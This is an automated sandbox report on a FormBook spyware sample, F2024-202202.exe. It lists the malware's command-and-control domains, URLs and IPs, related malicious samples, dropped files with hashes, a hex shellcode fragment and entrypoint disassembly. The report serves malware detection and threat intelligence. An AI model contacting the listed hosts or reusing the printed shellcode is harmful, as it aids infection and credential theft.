            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            http://www.kguyreoalpha.shop/0so0/1%VirustotalBrowse
            http://www.kguyreoalpha.shop0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            http://www.make-l.ru/0so0/1%VirustotalBrowse
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
            http://www.kguyreoalpha.shop0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.goodroothealth.com
            		66.113.136.229
            		truetrueunknown
            www.kguyreoalpha.shop
            		43.132.225.97
            		truetrueunknown
            www.make-l.ru
            		194.58.112.174
            		truetrueunknown
            www.waldil.online
            		188.114.96.3
            		truetrueunknown
            www.sweet777.work
            		unknown
            		unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://www.make-l.ru/0so0/true
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.kguyreoalpha.shop/0so0/true
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.goodroothealth.com/0so0/?X430XLq0=CY1s0XH7bNWttwV9rZ4SbfagXQ6dqpRCQvxAN47rZ58SWMnAte1QXQdn29aNO6h1oK8GMPzGoaIoZ8sBEayCkb2ait1G89/ayPLVJ4jhwFoJQSPoL8Uww1rncwUMKC4qFA==&Wd=vjk8lhT0U4true
            • Avira URL Cloud: safe
            		unknown
            http://www.kguyreoalpha.shop/0so0/?X430XLq0=ZXsyqv6OWO1jdfmZwPHK8dAntN05Z+dsmugw9BJBTbqyaa2WOVN+U2naZpjsCmE4tUAeXtTgCCsmM8Dup6ejRXHoa4TAR4CFgRPYrdUpMYgqMRztZg/3Zk7YYa9ZW1B17w==&Wd=vjk8lhT0U4true
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://ac.ecosia.org/autocomplete?q=openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://duckduckgo.com/chrome_newtabopenfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://duckduckgo.com/ac/?q=openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://www.google.com/images/branding/product/ico/googleg_lodp.icoopenfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchopenfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.kguyreoalpha.shopHCyQCFLUGWqlxNRVXC.exe, 00000006.00000002.3255683162.0000000004B21000.00000040.80000000.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://www.ecosia.org/newtab/openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            43.132.225.97
            		www.kguyreoalpha.shopJapan4249LILLY-ASUStrue
            194.58.112.174
            		www.make-l.ruRussian Federation
            		197695AS-REGRUtrue
            66.113.136.229
            		www.goodroothealth.comUnited States
            		3064AFFINITY-FTLUStrue

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1448090
            Start date and time:2024-05-27 19:14:04 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 8m 31s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:8
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:2
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:F2024-202202.exe
            Detection:MAL
            Classification:mal100.troj.spyw.evad.winEXE@7/5@5/3
            EGA Information:
            • Successful, ratio: 75%
            HCA Information:
            • Successful, ratio: 98%
            • Number of executed functions: 58
            • Number of non-executed functions: 268
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target HCyQCFLUGWqlxNRVXC.exe, PID 768 because it is empty
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing disassembly code.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            13:16:00API Interceptor2046362x Sleep call for process: openfiles.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            43.132.225.972300-02998.exeGet hashmaliciousFormBookBrowse
            • www.kguyreoalpha.shop/0so0/
            194.58.112.1742023-1392 Martin y Ruiz Recambio Surtekpdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • www.businessbots.shop/wbob/
            justiicante transferencia compra vvda-pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • www.businessbots.shop/wbob/
            Curriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
            • www.theppelin.online/zxqv/
            inquiry EBS# 82785.exeGet hashmaliciousFormBookBrowse
            • www.yamlex.ru/ji0p/
            2300-02998.exeGet hashmaliciousFormBookBrowse
            • www.make-l.ru/0so0/
            PI No 20000814C.exeGet hashmaliciousFormBookBrowse
            • www.kubanci.ru/3nn5/
            quotation.exeGet hashmaliciousFormBookBrowse
            • www.yamlex.ru/ji0p/
            SSDQ115980924.exeGet hashmaliciousFormBookBrowse
            • www.kubanci.ru/3nn5/
            Payment invoice.exeGet hashmaliciousFormBookBrowse
            • www.yamlex.ru/ji0p/
            quote.exeGet hashmaliciousFormBookBrowse
            • www.yamlex.ru/ji0p/
            66.113.136.2292300-02998.exeGet hashmaliciousFormBookBrowse
            • www.goodroothealth.com/0so0/
            BoTl06PDGl.exeGet hashmaliciousFormBookBrowse
            • www.goodroothealth.com/mrpm/?YtSp=JrQp6zU81nJt6Z&sR=M2jzcz4nEwyEV8mFq2hxwTmA3BRAoJVOjLM4xGlScogEw2I8xnL1d/UUSirNlJBZ3pBqCzpPjgSTEbz0PmvJ+iWVoqcDQ4zAyFhznaR0kDMawW2Z3nL3KP819m+kZlQ2nQ==
            ixtUbGW9Vx.exeGet hashmaliciousFormBookBrowse
            • www.goodroothealth.com/0so0/
            XJBYhQFCGi.exeGet hashmaliciousFormBookBrowse
            • www.goodroothealth.com/m8cr/
            A6en1Q0smW.exeGet hashmaliciousFormBookBrowse
            • www.goodroothealth.com/pdac/
            33BMmt58Bj.exeGet hashmaliciousFormBookBrowse
            • www.goodroothealth.com/dhra/
            SecuriteInfo.com.Win32.PWSX-gen.19996.21102.exeGet hashmaliciousFormBookBrowse
            • www.goodroothealth.com/m8cr/
            gMCSnfJRqp.exeGet hashmaliciousFormBookBrowse
            • www.goodroothealth.com/m8cr/
            Transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • www.fmusique.com/pgdv/?WLkuGdhD=uQ12DhZ6P0PPSP1sQKctiC1ycKy2mHADrS3rDHFCVKTeYgmXnOzK9a7SEQ64Y5UC08EQhocHk/371pO8nL0aHLaxSVuiBnnzug==&wr=UmpJ5
            payment_confirmation.exeGet hashmaliciousFormBookBrowse
            • www.fmusique.com/5h58/?t1lp=Y2fIKny1YS6Hj2ugxACm/Z2ngbjf60D+i6hucaGxtoAaSrv1AcY6hwawS71s2chZb6U+wtJFrSj4cJI90WvVa46X92fqcQD6Qg==&kfjb=6SukICCXjjKrzLi

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            www.kguyreoalpha.shop2300-02998.exeGet hashmaliciousFormBookBrowse
            • 43.132.225.97
            Lowe_list0605002024.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 43.132.225.97
            Xbkrgp2HX73cvU3.exeGet hashmaliciousFormBookBrowse
            • 43.132.225.97
            ixtUbGW9Vx.exeGet hashmaliciousFormBookBrowse
            • 43.132.225.97
            file.exeGet hashmaliciousFormBookBrowse
            • 43.132.225.97
            SOgv6zN9CC.exeGet hashmaliciousFormBook, PureLog Stealer, XWormBrowse
            • 43.132.225.97
            file.exeGet hashmaliciousFormBookBrowse
            • 43.132.225.97
            Search.exeGet hashmaliciousFormBook, PureLog StealerBrowse
            • 43.132.225.97
            rx5aqVjdjJKDgYx.exeGet hashmaliciousFormBookBrowse
            • 43.132.225.97
            file.exeGet hashmaliciousFormBookBrowse
            • 43.132.225.97
            www.goodroothealth.com2300-02998.exeGet hashmaliciousFormBookBrowse
            • 66.113.136.229
            BoTl06PDGl.exeGet hashmaliciousFormBookBrowse
            • 66.113.136.229
            ixtUbGW9Vx.exeGet hashmaliciousFormBookBrowse
            • 66.113.136.229
            XJBYhQFCGi.exeGet hashmaliciousFormBookBrowse
            • 66.113.136.229
            A6en1Q0smW.exeGet hashmaliciousFormBookBrowse
            • 66.113.136.229
            33BMmt58Bj.exeGet hashmaliciousFormBookBrowse
            • 66.113.136.229
            SecuriteInfo.com.Win32.PWSX-gen.19996.21102.exeGet hashmaliciousFormBookBrowse
            • 66.113.136.229
            gMCSnfJRqp.exeGet hashmaliciousFormBookBrowse
            • 66.113.136.229
            www.waldil.onlineLowe_list0605002024.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 104.21.94.235
            DHL Shipping Receipt_Waybill Doc_PRG2110017156060.exeGet hashmaliciousFormBookBrowse
            • 104.21.94.235
            QMrtQYunxY.exeGet hashmaliciousFormBookBrowse
            • 172.67.141.125
            f4CdNDrJp8.exeGet hashmaliciousFormBookBrowse
            • 104.21.94.235
            IMAGE_0010.exeGet hashmaliciousFormBookBrowse
            • 172.67.141.125
            LPO-582-AL SAFA.exeGet hashmaliciousFormBookBrowse
            • 104.21.94.235
            manufacturer this requirements.exeGet hashmaliciousFormBookBrowse
            • 104.21.94.235
            www.make-l.ru2300-02998.exeGet hashmaliciousFormBookBrowse
            • 194.58.112.174
            ixtUbGW9Vx.exeGet hashmaliciousFormBookBrowse
            • 194.58.112.174
            vRrSdSTG0c.exeGet hashmaliciousFormBookBrowse
            • 194.58.112.174
            our order 6076297.exeGet hashmaliciousFormBookBrowse
            • 194.58.112.174
            PO 1402-16 AH.exeGet hashmaliciousFormBook, PureLog StealerBrowse
            • 194.58.112.174
            Quotation MEW Tender 2024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
            • 194.58.112.174
            N270-10-MR-1671-01.exeGet hashmaliciousFormBook, PureLog StealerBrowse
            • 194.58.112.174

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            LILLY-ASUSnzKl7TpAyk.elfGet hashmaliciousUnknownBrowse
            • 43.134.110.125
            C4zDQjrSzj.elfGet hashmaliciousUnknownBrowse
            • 40.216.33.52
            Mt5VyD087r.elfGet hashmaliciousMiraiBrowse
            • 40.53.69.62
            PaRWfF3x5K.elfGet hashmaliciousUnknownBrowse
            • 43.60.124.133
            VgF8V1Q5pg.elfGet hashmaliciousUnknownBrowse
            • 40.4.106.169
            sKQrQ9KjPJ.elfGet hashmaliciousMiraiBrowse
            • 43.72.210.64
            i6bCVSCWc1.elfGet hashmaliciousMiraiBrowse
            • 40.52.70.4
            8PRlezZSuB.elfGet hashmaliciousUnknownBrowse
            • 42.65.116.139
            om4SVF6n0I.elfGet hashmaliciousMiraiBrowse
            • 43.54.183.75
            Xe3eO9R1Ra.elfGet hashmaliciousMiraiBrowse
            • 40.3.252.151
            AS-REGRU2023-1392 Martin y Ruiz Recambio Surtekpdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 194.58.112.174
            justiicante transferencia compra vvda-pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 194.58.112.174
            4TH HIRE SOA REMITTANCE_USD280,000.exeGet hashmaliciousFormBookBrowse
            • 31.31.196.16
            Tenuto.exeGet hashmaliciousFormBook, GuLoader, LummaC StealerBrowse
            • 37.140.192.90
            Curriculum Vitae Catalina Munoz.exeGet hashmaliciousFormBookBrowse
            • 194.58.112.174
            inquiry EBS# 82785.exeGet hashmaliciousFormBookBrowse
            • 194.58.112.174
            PAYMENT COPY.exeGet hashmaliciousFormBookBrowse
            • 31.31.198.106
            la.bot.mips.elfGet hashmaliciousUnknownBrowse
            • 193.124.16.254
            2300-02998.exeGet hashmaliciousFormBookBrowse
            • 194.58.112.174
            FRA.0038222.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 37.140.192.90
            AFFINITY-FTLUSla.bot.arm7.elfGet hashmaliciousUnknownBrowse
            • 216.219.155.128
            KkD4QJWEyx.elfGet hashmaliciousGafgyt, MiraiBrowse
            • 64.23.184.217
            qBotA88SDV.elfGet hashmaliciousGafgyt, MiraiBrowse
            • 64.23.184.217
            dDZYqd2t3k.elfGet hashmaliciousGafgyt, MiraiBrowse
            • 64.23.184.217
            ofWnd1cfmU.elfGet hashmaliciousGafgyt, MiraiBrowse
            • 64.23.184.217
            Jus1mkDZsJ.elfGet hashmaliciousGafgyt, MiraiBrowse
            • 64.23.184.217
            KgBEq4YGpw.elfGet hashmaliciousGafgyt, MiraiBrowse
            • 64.23.184.217
            mzdWUcvUU2.elfGet hashmaliciousGafgyt, MiraiBrowse
            • 64.23.184.217
            LJ6BZHggzR.elfGet hashmaliciousGafgyt, MiraiBrowse
            • 64.23.184.217
            GIPlLTG4sS.elfGet hashmaliciousGafgyt, MiraiBrowse
            • 64.23.184.217

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Temp\2y9KZy13

            Download File
            Process:C:\Windows\SysWOW64\openfiles.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
            Category:dropped
            Size (bytes):196608
            Entropy (8bit):1.121297215059106
            Encrypted:false
            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
            MD5:D87270D0039ED3A5A72E7082EA71E305
            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
            Malicious:false
            Reputation:high, very likely benign file
            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\Mazatl

            Download File
            Process:C:\Users\user\Desktop\F2024-202202.exe
            File Type:ASCII text, with very long lines (29758), with no line terminators
            Category:dropped
            Size (bytes):29758
            Entropy (8bit):3.556554661937332
            Encrypted:false
            SSDEEP:768:AiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbYE+I563b4vfF3if6gyf:AiTZ+2QoioGRk6ZklputwjpjBkCiw2RP
            MD5:C3AAC484CBA8FCB4EE40790A4D3C17BE
            SHA1:380DADB9599AEA92FC3FA398AF1D336D4CBF5892
            SHA-256:3A07F6408CD2BBCC8C79A74CE15D9751E8561589CD4692828644DEF81E53106E
            SHA-512:FB255F16EF71950169B76EADDB72B853891147EE44A0CE7EEDB8368A98B4B016998D3450214636489F1A4B3088C5E2ADE7A5EE9FFF287B1A300D6F93F2DCAB64
            Malicious:false
            Reputation:low
            Preview:1FEC9305B8B80D0A4D5BE5470B516E345C1E09CE62D1EF502E0FCD31BDB10x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffff

            C:\Users\user\AppData\Local\Temp\aut3BCF.tmp

            Download File
            Process:C:\Users\user\Desktop\F2024-202202.exe
            File Type:data
            Category:dropped
            Size (bytes):276480
            Entropy (8bit):7.99548355351693
            Encrypted:true
            SSDEEP:6144:MHxZe+vrFBlDg0fX/91qC2LhXKmRXRLM/0vhbQqRsdrsTjaq4:4/e+vrFw0fX/91qC2LhXKmBNA0vJQqRy
            MD5:CCFFDA8415140708F2D4EF3CADFCF33B
            SHA1:546D1494756AF1AF24FC33959BD80E6462B6CA8C
            SHA-256:0C3C3DF6FC7A238D16C9FD93189512CC53734880DFD9C97EDD1802CC57058688
            SHA-512:CB0FD3E61E19FD47577ED241FDAFC1D08A7012A26C0E3008D76A142DF5290CC2387B650D3256BA57B44EEAE16A9E6794D3DD0315E5E192660F8CCF07F5524AFA
            Malicious:false
            Reputation:low
            Preview:..|..SXQI`..E.....EE...MM...HSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQ.8X8BK.TM._.g.S..o.#P7h#*>.J9Ul7S4#W"e$Ur%A e"Wd...q$W<]bY?Pi8VEF0RWMOL..$/.e1..eX+.(...l%!.H.y+^.R..uX?..=Q2pX1.F0RW4NEKi.HS.PH8,r..2ZM8VEF0.W6ONJ2DHu\QI8X8LT2Z.,VEF RW4.AK9D.SXAI8X:LT4ZM8VEF0TW4NEK9DH.\QI:X8LT2ZO8..F0BW4^EK9DXSXAI8X8LT"ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZcL3=20RW.kAK9THSXwM8X(LT2ZM8VEF0RW4NeK9$HSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8

            C:\Users\user\AppData\Local\Temp\aut3BFF.tmp

            Download File
            Process:C:\Users\user\Desktop\F2024-202202.exe
            File Type:data
            Category:dropped
            Size (bytes):9976
            Entropy (8bit):7.577055608820035
            Encrypted:false
            SSDEEP:192:jLNAVE7gSydzvu8I6Yoa4qyedm9Y4+0q7j79sDCRCnEuY30J:HNAygSydzvuRDnnyedm9Y46jhJmEhg
            MD5:DA4BD12CB25650B5B176775CE1452E87
            SHA1:206E91FAA3FC8FBF71E26599BCAF19257B1626D7
            SHA-256:26B1D60B1F4FECC7BAE9D52937CE01E3A072CC59726B71F690A1F8F8BBB84953
            SHA-512:213EAEE3E33E3654A2B05B37F1DFF4773603DC635FB2FFBA8B3A414B2336080311D033CB6197862F79F8E6633DDC33F24AE77C798650E957144D99CF6EB6BF98
            Malicious:false
            Reputation:low
            Preview:EA06..t>...9..a5.N(S...aA.Q&.*,.i7.P.....g4...4Y..E.L...-.k0.Qf.j..g1.Q(S...k5.X..9...c....)...5.Mf.)......&.i..s4..&.)..j.%. ..a......N...(...a.6.,v+....m.YlS........s3.Z...9.X.3 ...f....a4.6.&.........6|s...gc.0....T...4.Y..`...k....l.1../.q5.N..2....$......x. ..$h.3.....#`...Mf...L.d.!...Mf.....' .Y...n.....0.N&.....d.U..&.<...l.U..'.5_....U..,`5_....U..f.5_..d.U.(..1......V...Nf.`..N&.`..M.^....j.7..$zn.....r..... !..Y&.G[....A6...f../.n.u.M.`>_L........)@...[..a6...z.2.... =........K<.l...$..6.{......0......r|3K%....L.6>....4...l......_......4|.+(.7.c...|3K%.d....f.9....c..i|v0F...a.l.,`.\..lsy...4.Y.o...mc..,s.$.k3.....f...`.....fcb..l.i....l..np..Y.....M..14.X@..4.......7d.N..;c...,.8.'.!....@!....f .....0.......Brb.....f.)...b..@!...g,. ....36.M&V`.......vd.....l3.,...B.B3p.N...;3.X..Q7...&..8.....f`...M.'I...x..C.....,vh...4.c9.L..@....`...g.,58..,.+..E3.....c.P..Y,3.....`Nf...N.@.;5.X.c9.w.!....f......n...X@A.$...`...g..38.X..I..(...Xl.b.,...#V9..s9..@

            C:\Users\user\AppData\Local\Temp\putrefactible

            Download File
            Process:C:\Users\user\Desktop\F2024-202202.exe
            File Type:data
            Category:dropped
            Size (bytes):276480
            Entropy (8bit):7.99548355351693
            Encrypted:true
            SSDEEP:6144:MHxZe+vrFBlDg0fX/91qC2LhXKmRXRLM/0vhbQqRsdrsTjaq4:4/e+vrFw0fX/91qC2LhXKmBNA0vJQqRy
            MD5:CCFFDA8415140708F2D4EF3CADFCF33B
            SHA1:546D1494756AF1AF24FC33959BD80E6462B6CA8C
            SHA-256:0C3C3DF6FC7A238D16C9FD93189512CC53734880DFD9C97EDD1802CC57058688
            SHA-512:CB0FD3E61E19FD47577ED241FDAFC1D08A7012A26C0E3008D76A142DF5290CC2387B650D3256BA57B44EEAE16A9E6794D3DD0315E5E192660F8CCF07F5524AFA
            Malicious:false
            Reputation:low
            Preview:..|..SXQI`..E.....EE...MM...HSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQ.8X8BK.TM._.g.S..o.#P7h#*>.J9Ul7S4#W"e$Ur%A e"Wd...q$W<]bY?Pi8VEF0RWMOL..$/.e1..eX+.(...l%!.H.y+^.R..uX?..=Q2pX1.F0RW4NEKi.HS.PH8,r..2ZM8VEF0.W6ONJ2DHu\QI8X8LT2Z.,VEF RW4.AK9D.SXAI8X:LT4ZM8VEF0TW4NEK9DH.\QI:X8LT2ZO8..F0BW4^EK9DXSXAI8X8LT"ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZcL3=20RW.kAK9THSXwM8X(LT2ZM8VEF0RW4NeK9$HSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8LT2ZM8VEF0RW4NEK9DHSXQI8X8

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):7.114003419458171
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:F2024-202202.exe
            File size:1'165'312 bytes
            MD5:0e7042c3256ba6a60bee8cf70a18958c
            SHA1:06cd123e5cf1784d0b29415ebf6f58d4d4b21847
            SHA256:85c1c78badee38d490bb6cb18e5f2fd19dbe97355af3d6823ac3b1c93f63f751
            SHA512:43556dc18d7de6d7f6cca055ab478058d23138aa4843947bf3463cd54c91f2f2b2d566b2ec73cb3ef585c58355a37855923cec01d65e0c2ec3b5374f7738508a
            SSDEEP:24576:oAHnh+eWsN3skA4RV1Hom2KXMmHa+6pNNRXgUm05:vh+ZkldoPK8Ya+6pnRD
            TLSH:9345AD0273D1C036FFAB92739B6AF20556BD79254133852F13982DB9B8701B2267E763
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

            File Icon

            Icon Hash:aaf3e3e3938382a0

            Static PE Info

            General

            Entrypoint:0x42800a
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
            Time Stamp:0x6654B17D [Mon May 27 16:14:53 2024 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:1
            File Version Major:5
            File Version Minor:1
            Subsystem Version Major:5
            Subsystem Version Minor:1
            Import Hash:afcdf79be1557326c854b6e20cb900a7

            Entrypoint Preview

            Instruction
            call 00007FE2D4CCCD0Dh
            jmp 00007FE2D4CBFAC4h
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            push edi
            push esi
            mov esi, dword ptr [esp+10h]
            mov ecx, dword ptr [esp+14h]
            mov edi, dword ptr [esp+0Ch]
            mov eax, ecx
            mov edx, ecx
            add eax, esi
            cmp edi, esi
            jbe 00007FE2D4CBFC4Ah
            cmp edi, eax
            jc 00007FE2D4CBFFAEh
            bt dword ptr [004C41FCh], 01h
            jnc 00007FE2D4CBFC49h
            rep movsb
            jmp 00007FE2D4CBFF5Ch
            cmp ecx, 00000080h
            jc 00007FE2D4CBFE14h
            mov eax, edi
            xor eax, esi
            test eax, 0000000Fh
            jne 00007FE2D4CBFC50h
            bt dword ptr [004BF324h], 01h
            jc 00007FE2D4CC0120h
            bt dword ptr [004C41FCh], 00000000h
            jnc 00007FE2D4CBFDEDh
            test edi, 00000003h
            jne 00007FE2D4CBFDFEh
            test esi, 00000003h
            jne 00007FE2D4CBFDDDh
            bt edi, 02h
            jnc 00007FE2D4CBFC4Fh
            mov eax, dword ptr [esi]
            sub ecx, 04h
            lea esi, dword ptr [esi+04h]
            mov dword ptr [edi], eax
            lea edi, dword ptr [edi+04h]
            bt edi, 03h
            jnc 00007FE2D4CBFC53h
            movq xmm1, qword ptr [esi]
            sub ecx, 08h
